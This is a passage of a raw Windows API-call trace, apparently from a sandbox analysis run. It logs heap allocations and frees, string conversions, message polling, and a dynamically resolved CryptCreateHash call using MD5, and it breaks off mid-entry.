HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0236.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0236.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0236.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51478, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0236.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.441] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0236.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0236.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0236.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0236.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0236.442] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0236.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0236.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0236.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0236.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0236.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0236.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0236.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0236.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.445] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0236.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0236.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0236.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0236.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0236.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55008, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0236.448] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0236.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f78 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0236.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0236.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0236.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0236.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0236.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0236.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0236.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0236.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0236.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0236.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0236.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0236.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0236.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0236.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55038, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0236.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0236.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 